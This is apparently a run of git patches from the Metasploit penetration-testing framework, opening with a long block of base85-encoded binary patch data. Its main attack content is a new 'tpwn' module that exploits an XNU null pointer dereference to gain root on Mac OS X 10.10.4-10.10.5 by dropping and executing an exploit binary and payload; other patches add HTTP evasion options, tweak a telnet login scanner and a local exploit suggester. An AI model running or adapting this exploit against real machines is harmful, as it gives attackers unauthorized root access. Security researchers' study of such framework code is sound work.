zWO+ZDfbmO^cVRDicY^;fRmmSBp+D3oUo7<9M+TM@`foi6eSQC^S_gqDV!dAz`cFvc
z_xFjBg`S^)v3sdGd-Vnf?KD%i_t_o`<E6s`3j>qbfGZJg;Ut+O#n$MX;3z((E>*(x
z_LA1hi_ed>#pf*MO7L|bEkO4XUpOl4HHZEAt${g;&d2T+tN^TTdvtTNw){uh*cbpu
zw5qQqDX#5biYo@uW}i}oIJ&g;oIqtW2`Id}ltv4$-U)3-!-r|i(0)7-*e%)LP^|Yk
zsd5uBc{13+3(zoH&mTUc&Vpw&v*lhA=e-Gy^b+d&HwPAKp9~UZ8iNEvrfW#1e1E2U
zHSN{p*e|I`b@isjIDtiI=2Y}rxBUElXeJ3d*(y%yiK{sHx@Q6Sx`*0HrkQiz7=#eJ
zP0x%$8$}Uo>oi5WW4kqk)>{*})JqkIIZ|}bAw3OWXnqN;f(S6*a@c39Jj;A1q1EI@
zcYP#u7Z76B<*<K*ra>T#gq8!JI`@Wt01(qJC-sS%XW;*Q{Y#RNYM+FI)xDOzU7$Y6
z5bnz`AJDc71;89skHbE><DS^_nx4DlJrRHXIRcd#-0M#y<RM{`8ixFUKnx}HNenAv
zSpqR%Oc|Td8Yv@%eYVOX*!_orMF3@V0TC%9h5aM^!5|PuLiNC-DdYD5k}^_KpQu?G
zEeWW<1RKoJOBruOC&XvLUT-mHGyjDgV2JdP!af<}PN+OMa3{p|FnShxXhYko9@YT@
zF_h3JF|3C#9MBW<#q{tFv_^VJVV|wC2+9*$O+FN%hqnU}=^=&vBmAHL*0YfuVI(vU
zcr-oy4nWdFO6n6e>*4wY)L%eC>fv{|rKOi1J_B(inG{vKW>iwM@zsH?o6sEa1_Ot~
zK6&K+czVBHe1qjtGuM9fGh#^HBhl^CgjfHr7o)o&%kBXuPW9e6pdr`FyJWl>#nV4+
zA&8r3PlmP-s6?Xi5f1L|)leN8!X>)M@PnUoWx*8?I>wEboD1F}Vly=xsZ`IZ&%uzC
zB9-dVZKb-ySgD>>SMpIYRQDE?r|Ez~mi;qD1o2*F_n9xtzUWn?-<B;Zvm(|*vthDD
ztcPzeU052i{%KLE4W`ZeFl`PIjvlo^nH2qOAJxtkl@>Hwqcuulk_z11POdOsROUr0
zC#sClX*NvLP&KM81kDuoRsCMBK1Ea(shgRivLsSjP6)KU+vZHg15Ogoy8mS)xEkQB
zTTq#S&$`c`Sii?i2T?$~0$8Hm_Z#rMyEQ`FaKQsf&X+bK;~RJp@EdTxw0<~xQoH{L
zu>bR=-(i&fW1cVF3C=Y!%>}4GU#i4J)cbr%yiO<Hk>FcrcjA2`jbU+J{KUIRc#L%7
zJ;;zxyr<FaA>H{dR~DXh(QFc)OwpVnJlUc-OL%fcvqgBui{?DxnJAhIglCFq)}Mb5
zd_K8=xbN@$oAR~uZx&PurZpwm^mH2Q{6N#w2UMot^KWXS-}7%2_`K)e5ju>~%}@8L
z=ifWkyL0By)^Fx4bq`c7L0`Vk=iyNd4NaeZ53v9F>LQd7VbZvNwEH=obXKYkyGH@W
z=PUIxqB-<q=&Hh^Y3)?6=_sVl;&rjr{9NZ(G;!Um-Cv@~?(@%A;$XPH8x@Zc=lrh*
z$^X4!Ok8wM6pc+cN&gk%1mWuMUm^COfHvL4@2d~;{$FG$TeBFQk)dqR0#bLle?eCx
zBSZNrCPTUK>4^-rz^7bXKQ`t@ABG{DoXaW1nsx~?9dPt_C`wmS%?QJ*-z8ff2tMT4
zDEu!7#ok106C5-rkEZeAH&h=FjBMR@8cF=WM$y}m8+*f=j9MS2$70uNIOyNd(C{(T
zkKU}pe<%1_u31iKlU`X+kdLh_4a*$0<{7H_DOwM&9!h8R)@a0f3{n1PnQ(PfyU!cl
zi=-I0y8!ohaeWLE!du`ibfNdd5)C;7@R<(J-2>ox9r@wau`9uks5L=vS9BWSuCeqb
zpsul5>}RuYVLzAsJod-4U%>uE_KVn`!hQ++<?K&me<u60*`Le)0`?cOznFao`;F|o
z*!QsSXTO>KmF%~$-^TtL_SdrC&i;e!uZQ1gWKe?N-U!~LqaT3H#?b`f?4_#_$|N1d
z+jUoC4MDpJk_p;EkRWIiK_sN3PZ0DRL5~u2kf4VMdXJ!Xg3b_h4?*<Lt4CK7bSXhz
zg03K_k)Ue`T0~GKL30V3N6>VFWP)gMXk10mB!V^&G@hXUAZQFh&l8kIP=uiK2zrAc
zBS9Y#^cfVfv5TPN1dYUiI{F?#mk{&@L3sr2Bj|d9b`Vrf&~FJ^NYK*+c?kLyLH7{!
zb3n7^%uzqDrG6ahHmARF-rR~JHF2_p&$h^Q{tCBuhP*;{%n8)`>by=5J|0#xrwm`O
zamh2?c1Nkh;l+oQq(GC;+0Z0AX1bdi$j!IA0<v`b)puB?x&tmp)0KWpJwC%_v0HAf
znQdvXI~rvFc#FN(?e*gWUlZ^xBmO>^?vqATSN(XFWvtKA<n~+8klVFPc1#$-h_y`0
zsi)8BOh&m8_<~Tavnk)#DCIA;*EQOf$lfN|)$6l2GdS6o-$%B!*)M}3`p8dJO=-a4
zbXVAyI$bL!EWyXs@DZFQWcz*j)%LoYIf*5tI``5Ec8|v;PjI@I;JZNy^}*(M=gz<8
zS}oDq)ZlEA=lNvsRF@MNrK*}~<y8v^zt`<@;lpVO1tns2S-{mKd+oI@S#rttC9=b^
z#O`x>Ek2jiA&<9|SPGiQ78Fi$xtd2vw%YH@Ubkec3wXUiZ}WKFbrSowK%G~10CxMF
z%{GE<=n#}_Y@kAQpv6{IbE}M+KIby@blsA9O)mJv!K}i9s+!yIZKRoQx2MSMk((;*
ze%ZQA%>#4RWoT`VJK(L8_1RWmo!y0x9yK*sJYMHAr%P^-eWNW`-??1&`d7HU0jJvo
zqN{3Vx*H^$ztJn(9X7eSPWI4;lJMa!f56)$Ih?FbAlKq`yP-t20l&rH==4Eb=o3yB
zKye{Wut;hjTN-7%$FkJE!cr?+>fBy$z~hGm>g^yS7Fg)3TqITc=G<~G)Y#&#ulGSP
z_@a^ejVc8Et*TgvvBclfqs<m_^QKdd3S+^?HE#oUnyB{Rp7ApzX%bus+;q6PaEss?
z;k<Aw;qHNJhkFR_QMf1IHo<Ly+YNUB?g-oma38~+fium-_u1gG;jVxyfSU|g4mS&K
z0bDJd3vL-4Jv-=~2JnSyH07rxkdi=30x1ckB#@FoN&+bfq$H4%KuQ8B38W;DlECMX
z0DZS!!2JwvHymEK=~jv~uUbXcGyXZ6NL5KmASHp61X2=6NgySGlmt=|NJ$_ifs_PN
z5=coPC4sM40_Ts;Ts)@imNC-YGEe#~7g!EFXlNNd#AEObxkWm^#I~fWrrM4h4c^(f
zBvUTe+XF7YbjzLT?H88V=;!t9bxUwxV~MRHVD~ztmXo+O#E+r9#Kw1D{C3|Gn@@Jt
z+oTp_dkOubminuFxFO@f<&qY<ET>h;B%D(#aP<U;ae0F;22FL@eZE`edKtGz>SU>9
zy`lZiOi)%;gK|x{95mJLa?PPj9o}l$-{^Ko?b4lD`U1DgxK81dDLtFhtH6)l@Al53
zUnxYYg;VFq-et}@d8*5;md(|tR?7ZryT7gxmol_+KB}3gFB2<38RPXCHMpHZi3Lck
znKJ{ePIY@$(9I>;L9r_OSwQ4ZWTC3}We_duA!E8GLdB*a9sJ@Z48=+ilbhwbWz1kX
z$DGX8G{E&<nbT(y45|8at7g@dTk$b+RGp1PTww_~S!Qz)<1Sn3YoOc(vA73aZ{zlG
z!-jGeCgeDqaCgXW^Ew+Ex!J{>8zav_F?ng-QV-Q^RAWe>n2Tad?Vj9uv#J(cQ&4a%
zC3=uZ*Le~W{Yb=hohE-h6=|kez|TFf5-={uXgstSDC+lW&9!M!mn#1?99_}Ga$BoL
z=(bKmQ|*+#Y-s|+4{B)+Suck5hKoQdepk!}iOrFlNQ$_mgJ1b;<Q@t5Wg9O1kd|Le
zS9JbgJx6ld4I2#|hS{FIX|rb+NT0oxj{o*FSimIx*C#!66^Sk#x!{QZhvDct(l$6;
zUYAay4g&reK`Mv;f8cVL#ILV)|KJ_2u;B;rs5EeB^$Gy%>t)94#eYIhS3a*t`H{Mx
ztV32e-Wc66da~kpd;RoWjFz6bhXc3zlXHX_xEmmWDFDi>_MybQ*+9Fj>V0M~!TNCx
z;(&=KiMC&3uuTWMb?_=3yg>(V)WP)6i7`B{sW3G!ol;@y4~ag5hChZ!>ELlXxKIZd
z>tMR(j6bex)xmRh@In=akNab~^p!feT?hYC2h#;r{4xGc9lTQqzoLVWs4(l`Uv%kz
z*TF*}ZA2L-U1yEK7wX{4bnv%y@HibjSqE3@;Q2b38X<ubL8MT$pKgM~|D#E`C`zAT
zmFV9r@eyp^cRwE?{e~&scgutu1$QwV-Fv?j?lL&K8~;ymIdB%Z(Qsqnz6F;HHx}*+
zxGUjEF)xQ32ZyJGe&>>Yj`9+?uM2G;1=luv&zci>a;+l+z}AGH!nAc?7Vc;Dk7vc!
zeWWC;_=qR0_3?PJRX(2Ey}rkjcxCT<O&{2tK?&`Ctlpa9l|G4m6<hXW3qC?jis~ZY
zV|kA)?8z;-_(HEjiA%gLEn#t2({&ad5_p}Dt?(4m+TLSTPh2E>tnRUOU0u;*Yk6!D
rr;t`}{QNMMZTN}nb;3eT5#0*i%hdGR9p1_L`PWS<oOs<tnrr_LNm{$I

literal 0
HcmV?d00001


From 26165ea93f3171d2718fb5e7b49dbca58318cdd8 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Mon, 17 Aug 2015 17:07:58 -0500
Subject: [PATCH 1004/1013] Add tpwn module

---
 modules/exploits/osx/local/tpwn.rb | 98 ++++++++++++++++++++++++++++++
 1 file changed, 98 insertions(+)
 create mode 100644 modules/exploits/osx/local/tpwn.rb

diff --git a/modules/exploits/osx/local/tpwn.rb b/modules/exploits/osx/local/tpwn.rb
new file mode 100644
index 0000000000..bfd0864d61
--- /dev/null
+++ b/modules/exploits/osx/local/tpwn.rb
@@ -0,0 +1,98 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Local
+
+  Rank = NormalRanking
+
+  include Msf::Post::OSX::System
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Mac OS X "tpwn" Privilege Escalation',
+      'Description'    => %q{
+        This module exploits a null pointer dereference in XNU to escalate
+        privileges to root.
+
+        Tested on 10.10.4 and 10.10.5.
+      },
+      'Author'         => [
+        'qwertyoruiop', # Vulnerability discovery and PoC
+        'wvu'           # Copy/paste monkey
+      ],
+      'References'     => [
+        ['URL', 'https://github.com/kpwn/tpwn']
+      ],
+      'DisclosureDate' => 'Aug 16 2015',
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'osx',
+      'Arch'           => ARCH_X86_64,
+      'SessionTypes'   => ['shell'],
+      'Privileged'     => true,
+      'Targets'        => [
+        ['Mac OS X 10.10.4-10.10.5', {}]
+      ],
+      'DefaultTarget'  => 0
+    ))
+
+    register_options([
+      OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
+    ])
+  end
+
+  def check
+    ver?? Exploit::CheckCode::Appears : Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    print_status("Writing exploit to `#{exploit_file}'")
+    write_file(exploit_file, binary_exploit)
+    register_file_for_cleanup(exploit_file)
+
+    print_status("Writing payload to `#{payload_file}'")
+    write_file(payload_file, binary_payload)
+    register_file_for_cleanup(payload_file)
+
+    print_status('Executing exploit...')
+    cmd_exec(sploit)
+    print_status('Executing payload...')
+    cmd_exec(payload_file)
+  end
+
+  def ver?
+    Gem::Version.new(get_sysinfo['ProductVersion']).between?(
+      Gem::Version.new('10.10.4'), Gem::Version.new('10.10.5')
+    )
+  end
+
+  def sploit
+    "chmod +x #{exploit_file} #{payload_file} && #{exploit_file}"
+  end
+
+  def binary_exploit
+    File.read(File.join(
+      Msf::Config.data_directory, 'exploits', 'tpwn', 'tpwn'
+    ))
+  end
+
+  def binary_payload
+    Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
+  end
+
+  def exploit_file
+    @exploit_file ||=
+      "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(8)}"
+  end
+
+  def payload_file
+    @payload_file ||=
+      "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(8)}"
+  end
+
+end

From 182c1bc7fe347ffbb8307318b137ad92f817f411 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 17 Aug 2015 18:20:04 -0500
Subject: [PATCH 1005/1013] Disconnect socket when login fails

---
 modules/auxiliary/scanner/telnet/telnet_login.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/modules/auxiliary/scanner/telnet/telnet_login.rb b/modules/auxiliary/scanner/telnet/telnet_login.rb
index 069e3f44dc..e9315b7ba4 100644
--- a/modules/auxiliary/scanner/telnet/telnet_login.rb
+++ b/modules/auxiliary/scanner/telnet/telnet_login.rb
@@ -89,6 +89,7 @@ class Metasploit3 < Msf::Auxiliary
       else
         invalidate_login(credential_data)
         vprint_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"
+        disconnect(scanner.sock)
       end
     end
   end

From d54249370b406468b7a1931b42ddc95fec79f358 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Mon, 17 Aug 2015 18:25:16 -0500
Subject: [PATCH 1006/1013] Move tpwn source to external/source/exploits

---
 {data => external/source}/exploits/tpwn/Makefile       | 0
 {data => external/source}/exploits/tpwn/import.h       | 0
 {data => external/source}/exploits/tpwn/lsym.h         | 0
 {data => external/source}/exploits/tpwn/lsym.m         | 0
 {data => external/source}/exploits/tpwn/lsym_gadgets.h | 0
 {data => external/source}/exploits/tpwn/main.m         | 0
 6 files changed, 0 insertions(+), 0 deletions(-)
 rename {data => external/source}/exploits/tpwn/Makefile (100%)
 rename {data => external/source}/exploits/tpwn/import.h (100%)
 rename {data => external/source}/exploits/tpwn/lsym.h (100%)
 rename {data => external/source}/exploits/tpwn/lsym.m (100%)
 rename {data => external/source}/exploits/tpwn/lsym_gadgets.h (100%)
 rename {data => external/source}/exploits/tpwn/main.m (100%)

diff --git a/data/exploits/tpwn/Makefile b/external/source/exploits/tpwn/Makefile
similarity index 100%
rename from data/exploits/tpwn/Makefile
rename to external/source/exploits/tpwn/Makefile
diff --git a/data/exploits/tpwn/import.h b/external/source/exploits/tpwn/import.h
similarity index 100%
rename from data/exploits/tpwn/import.h
rename to external/source/exploits/tpwn/import.h
diff --git a/data/exploits/tpwn/lsym.h b/external/source/exploits/tpwn/lsym.h
similarity index 100%
rename from data/exploits/tpwn/lsym.h
rename to external/source/exploits/tpwn/lsym.h
diff --git a/data/exploits/tpwn/lsym.m b/external/source/exploits/tpwn/lsym.m
similarity index 100%
rename from data/exploits/tpwn/lsym.m
rename to external/source/exploits/tpwn/lsym.m
diff --git a/data/exploits/tpwn/lsym_gadgets.h b/external/source/exploits/tpwn/lsym_gadgets.h
similarity index 100%
rename from data/exploits/tpwn/lsym_gadgets.h
rename to external/source/exploits/tpwn/lsym_gadgets.h
diff --git a/data/exploits/tpwn/main.m b/external/source/exploits/tpwn/main.m
similarity index 100%
rename from data/exploits/tpwn/main.m
rename to external/source/exploits/tpwn/main.m

From 015d04573095960c1dc30d77ce3e7c6b4fbef584 Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Tue, 18 Aug 2015 15:55:35 -0500
Subject: [PATCH 1007/1013] read max_size bytes at a time

---
 lib/rex/proto/http/client.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb
index d15a999777..f8a582a7d1 100644
--- a/lib/rex/proto/http/client.rb
+++ b/lib/rex/proto/http/client.rb
@@ -586,8 +586,8 @@ class Client
 
         begin
 
-          buff = conn.get_once(-1, 1)
-          rv   = resp.parse( buff || '' )
+          buff = conn.get_once(resp.max_data, 1)
+          rv   = resp.parse(buff || '')
 
         # Handle unexpected disconnects
         rescue ::Errno::EPIPE, ::EOFError, ::IOError

From 2e4944b8ecafbb6253206af3b116fb319bbc1cef Mon Sep 17 00:00:00 2001
From: Jon Hart <jon_hart@rapid7.com>
Date: Thu, 20 Aug 2015 10:05:04 -0700
Subject: [PATCH 1008/1013] Remove unnecessary version_random_case option

---
 lib/rex/proto/http/client_request.rb | 5 -----
 1 file changed, 5 deletions(-)

diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb
index e2d425c6c9..a048138269 100644
--- a/lib/rex/proto/http/client_request.rb
+++ b/lib/rex/proto/http/client_request.rb
@@ -52,7 +52,6 @@ class ClientRequest
     'method_random_case'     => false,   # bool
     'version_random_valid'   => false,   # bool
     'version_random_invalid' => false,   # bool
-    'version_random_case'    => false,   # bool
     'uri_dir_self_reference' => false,   # bool
     'uri_dir_fake_relative'  => false,   # bool
     'uri_use_backslashes'    => false,   # bool
@@ -344,10 +343,6 @@ class ClientRequest
       ret = Rex::Text.rand_text_alphanumeric(rand(20)+1)
     end
 
-    if (opts['version_random_case'])
-      ret = Rex::Text.to_rand_case(ret)
-    end
-
     ret << "\r\n"
   end
 

From 407d701fd9977008d701e02d0d6fc404d45a7253 Mon Sep 17 00:00:00 2001
From: Jon Hart <jon_hart@rapid7.com>
Date: Thu, 20 Aug 2015 10:05:16 -0700
Subject: [PATCH 1009/1013] Remove unnecessary version_random_case option

---
 lib/rex/proto/http/client.rb | 1 -
 1 file changed, 1 deletion(-)

diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb
index f8a582a7d1..3af1e4080d 100644
--- a/lib/rex/proto/http/client.rb
+++ b/lib/rex/proto/http/client.rb
@@ -58,7 +58,6 @@ class Client
       'method_random_case'     => 'bool',
       'version_random_valid'   => 'bool',
       'version_random_invalid' => 'bool',
-      'version_random_case'    => 'bool',
       'uri_dir_self_reference' => 'bool',
       'uri_dir_fake_relative'  => 'bool',
       'uri_use_backslashes'    => 'bool',

From 0bb9324c8d86f8e734f224236a4b4a7f31fcf9c4 Mon Sep 17 00:00:00 2001
From: Jon Hart <jon_hart@rapid7.com>
Date: Thu, 20 Aug 2015 10:05:42 -0700
Subject: [PATCH 1010/1013] Pass HTTP::version_random_valid and
 HTTP::version_random_invalid

Fixes #5871
---
 lib/metasploit/framework/login_scanner/http.rb | 10 ++++++++++
 lib/msf/core/exploit/http/client.rb            |  6 ++++++
 2 files changed, 16 insertions(+)

diff --git a/lib/metasploit/framework/login_scanner/http.rb b/lib/metasploit/framework/login_scanner/http.rb
index c621fcf345..77928c41bb 100644
--- a/lib/metasploit/framework/login_scanner/http.rb
+++ b/lib/metasploit/framework/login_scanner/http.rb
@@ -73,6 +73,14 @@ module Metasploit
         #   @return [Boolean] Whether to use random casing for the HTTP method
         attr_accessor :evade_method_random_case
 
+        # @!attribute evade_version_random_valid
+        #   @return [Boolean] Whether to use a random, but valid, HTTP version for request
+        attr_accessor :evade_version_random_valid
+
+        # @!attribute evade_version_random_invalid
+        #   @return [Boolean] Whether to use a random invalid, HTTP version for request
+        attr_accessor :evade_version_random_invalid
+
         # @!attribute evade_uri_dir_self_reference
         #   @return [Boolean] Whether to insert self-referential directories into the uri
         attr_accessor :evade_uri_dir_self_reference
@@ -294,6 +302,8 @@ module Metasploit
             'method_random_valid'    => evade_method_random_valid,
             'method_random_invalid'  => evade_method_random_invalid,
             'method_random_case'     => evade_method_random_case,
+            'version_random_valid'   => evade_version_random_valid,
+            'version_random_invalid' => evade_version_random_invalid,
             'uri_dir_self_reference' => evade_uri_dir_self_reference,
             'uri_dir_fake_relative'  => evade_uri_dir_fake_relative,
             'uri_use_backslashes'    => evade_uri_use_backslashes,
diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb
index 83eaedff66..72b378980f 100644
--- a/lib/msf/core/exploit/http/client.rb
+++ b/lib/msf/core/exploit/http/client.rb
@@ -68,6 +68,8 @@ module Exploit::Remote::HttpClient
         OptBool.new('HTTP::method_random_valid', [false, 'Use a random, but valid, HTTP method for request', false]),
         OptBool.new('HTTP::method_random_invalid', [false, 'Use a random invalid, HTTP method for request', false]),
         OptBool.new('HTTP::method_random_case', [false, 'Use random casing for the HTTP method', false]),
+        OptBool.new('HTTP::version_random_valid', [false, 'Use a random, but valid, HTTP version for request', false]),
+        OptBool.new('HTTP::version_random_invalid', [false, 'Use a random invalid, HTTP version for request', false]),
         OptBool.new('HTTP::uri_dir_self_reference', [false, 'Insert self-referential directories into the uri', false]),
         OptBool.new('HTTP::uri_dir_fake_relative', [false, 'Insert fake relative directories into the uri', false]),
         OptBool.new('HTTP::uri_use_backslashes', [false, 'Use back slashes instead of forward slashes in the uri ', false]),
@@ -176,6 +178,8 @@ module Exploit::Remote::HttpClient
       'method_random_valid'    => datastore['HTTP::method_random_valid'],
       'method_random_invalid'  => datastore['HTTP::method_random_invalid'],
       'method_random_case'     => datastore['HTTP::method_random_case'],
+      'version_random_valid'   => datastore['HTTP::version_random_valid'],
+      'version_random_invalid' => datastore['HTTP::version_random_invalid'],
       'uri_dir_self_reference' => datastore['HTTP::uri_dir_self_reference'],
       'uri_dir_fake_relative'  => datastore['HTTP::uri_dir_fake_relative'],
       'uri_use_backslashes'    => datastore['HTTP::uri_use_backslashes'],
@@ -236,6 +240,8 @@ module Exploit::Remote::HttpClient
       evade_method_random_valid:     datastore['HTTP::method_random_valid'],
       evade_method_random_invalid:   datastore['HTTP::method_random_invalid'],
       evade_method_random_case:      datastore['HTTP::method_random_case'],
+      evade_version_random_valid:    datastore['HTTP::version_random_valid'],
+      evade_version_random_invalid:  datastore['HTTP::version_random_invalid'],
       evade_uri_dir_self_reference:  datastore['HTTP::uri_dir_self_reference'],
       evade_uri_dir_fake_relative:   datastore['HTTP::uri_dir_fake_relative'],
       evade_uri_use_backslashes:     datastore['HTTP::uri_use_backslashes'],

From b20a283617d06274308beb9f2e533ddcb1eb7afc Mon Sep 17 00:00:00 2001
From: Mo Sadek <msadek@rapid7.com>
Date: Thu, 20 Aug 2015 13:57:16 -0500
Subject: [PATCH 1011/1013] Added report_note to suggester

---
 .../post/multi/recon/local_exploit_suggester.rb  | 16 +++++++++++-----
 1 file changed, 11 insertions(+), 5 deletions(-)

diff --git a/modules/post/multi/recon/local_exploit_suggester.rb b/modules/post/multi/recon/local_exploit_suggester.rb
index 64962b4ac6..f3ca1ca464 100644
--- a/modules/post/multi/recon/local_exploit_suggester.rb
+++ b/modules/post/multi/recon/local_exploit_suggester.rb
@@ -5,6 +5,8 @@
 
 require 'msf/core'
 
+include Msf::Auxiliary::Report
+
 class Metasploit3 < Msf::Post
 
   def initialize(info={})
@@ -14,11 +16,10 @@ class Metasploit3 < Msf::Post
           This module suggests local meterpreter exploits that can be used. The
           exploits are suggested based on the architecture and platform that
           the user has a shell opened as well as the available exploits in
-          meterpreter. Additionally, the ShowDescription option can be set
-          to 'true' to a detailed description on the suggested exploits.
+          meterpreter.
 
           It's important to note that not all local exploits will be fired.
-          They are chosen based on these conditions: session type,
+          Exploits are chosen based on these conditions: session type,
           platform, architecture, and required default options.
         },
         'License'       => MSF_LICENSE,
@@ -138,7 +139,7 @@ class Metasploit3 < Msf::Post
     end
 
     show_found_exploits
-
+    results = []
     @local_exploits.each do |m|
       begin
         checkcode = m.check
@@ -146,6 +147,7 @@ class Metasploit3 < Msf::Post
         if is_check_interesting?(checkcode)
           # Prints the full name and the checkcode message for the exploit
           print_good("#{m.fullname}: #{checkcode.second}")
+          results << [m.fullname, checkcode.second]
           # If the datastore option is true, a detailed description will show
           if datastore['SHOWDESCRIPTION']
             # Formatting for the description text
@@ -160,9 +162,13 @@ class Metasploit3 < Msf::Post
         vprint_error("#{e.class} #{m.shortname} failled to run: #{e.message}")
       end
     end
+    report_note(
+                :host => rhost,
+                :type => "les_results",
+                :data => results.inspect
+                )
   end
 
-
   def is_check_interesting?(checkcode)
     [
       Msf::Exploit::CheckCode::Vulnerable,

From d264802ce03be3e13dfc8220adc9e9bf40175bf3 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Fri, 21 Aug 2015 12:38:58 -0500
Subject: [PATCH 1012/1013] Consistency and API conformance changes to LES

---
 lib/msf/core/post/common.rb                    |  6 ++++--
 .../multi/recon/local_exploit_suggester.rb     | 18 ++++++++++++------
 2 files changed, 16 insertions(+), 8 deletions(-)

diff --git a/lib/msf/core/post/common.rb b/lib/msf/core/post/common.rb
index 6cbec94226..85e3af4d3a 100644
--- a/lib/msf/core/post/common.rb
+++ b/lib/msf/core/post/common.rb
@@ -305,12 +305,14 @@ module Msf::Post::Common
     # Special handle some cases that ARCH_TYPES won't recognize.
     # https://msdn.microsoft.com/en-us/library/aa384274.aspx
     case target_arch
-    when /i386/, /i686/
+    when /i[3456]86|wow64/i
       return ARCH_X86
-    when /amd64/i, /ia64/i
+    when /(amd|ia|x)64/i
       return ARCH_X86_64
     end
 
+    # Detect tricky variants of architecture types upfront
+
     # Rely on ARCH_TYPES to tell us a framework-recognizable ARCH.
     # Notice we're sorting ARCH_TYPES first, so that the longest string
     # goes first. This step is used because sometimes let's say if the target
diff --git a/modules/post/multi/recon/local_exploit_suggester.rb b/modules/post/multi/recon/local_exploit_suggester.rb
index f3ca1ca464..823c8b71e4 100644
--- a/modules/post/multi/recon/local_exploit_suggester.rb
+++ b/modules/post/multi/recon/local_exploit_suggester.rb
@@ -88,7 +88,9 @@ class Metasploit3 < Msf::Post
 
 
   def set_module_options(mod)
-    mod.datastore.merge!(self.datastore)
+    self.datastore.each_pair do |k,v|
+      mod.datastore[k] = v
+    end
     if !mod.datastore['SESSION'] && session.present?
       mod.datastore['SESSION'] = session.sid
     end
@@ -120,6 +122,7 @@ class Metasploit3 < Msf::Post
     end
   end
 
+
   def show_found_exploits
     if datastore['VERBOSE']
       print_status("The following #{@local_exploits.length} exploit checks are being tried:")
@@ -151,7 +154,9 @@ class Metasploit3 < Msf::Post
           # If the datastore option is true, a detailed description will show
           if datastore['SHOWDESCRIPTION']
             # Formatting for the description text
-            print_line Rex::Text.wordwrap(Rex::Text.compress(m.description), 2, 70)
+            Rex::Text.wordwrap(Rex::Text.compress(m.description), 2, 70).split(/\n/).each do |line|
+              print_line line
+            end
           end
         else
           vprint_status("#{m.fullname}: #{checkcode.second}")
@@ -163,12 +168,13 @@ class Metasploit3 < Msf::Post
       end
     end
     report_note(
-                :host => rhost,
-                :type => "les_results",
-                :data => results.inspect
-                )
+      :host => rhost,
+      :type => "local.suggested_exploits",
+      :data => results
+    )
   end
 
+
   def is_check_interesting?(checkcode)
     [
       Msf::Exploit::CheckCode::Vulnerable,

From 717b1bdd6ab593411b7fa9bb726fd068556d972d Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 21 Aug 2015 15:46:18 -0500
Subject: [PATCH 1013/1013] Fix bugs: Empty -O, empty origins

---
 lib/msf/ui/console/command_dispatcher/db.rb | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb
index 30f3e2ffcc..13287d2d36 100644
--- a/lib/msf/ui/console/command_dispatcher/db.rb
+++ b/lib/msf/ui/console/command_dispatcher/db.rb
@@ -983,6 +983,10 @@ class Db
         set_rhosts = true
       when '-O', '--origins'
         hosts = args.shift
+        if !hosts
+          print_error("Argument required for -O")
+          return
+        end
         arg_host_range(hosts, origin_ranges)
       else
         # Anything that wasn't an option is a host to search for
@@ -1074,8 +1078,7 @@ class Db
           next
         end
 
-        if core.logins.empty?
-
+        if core.logins.empty? && origin_ranges.empty?
           tbl << [
             "", # host
             "", # cred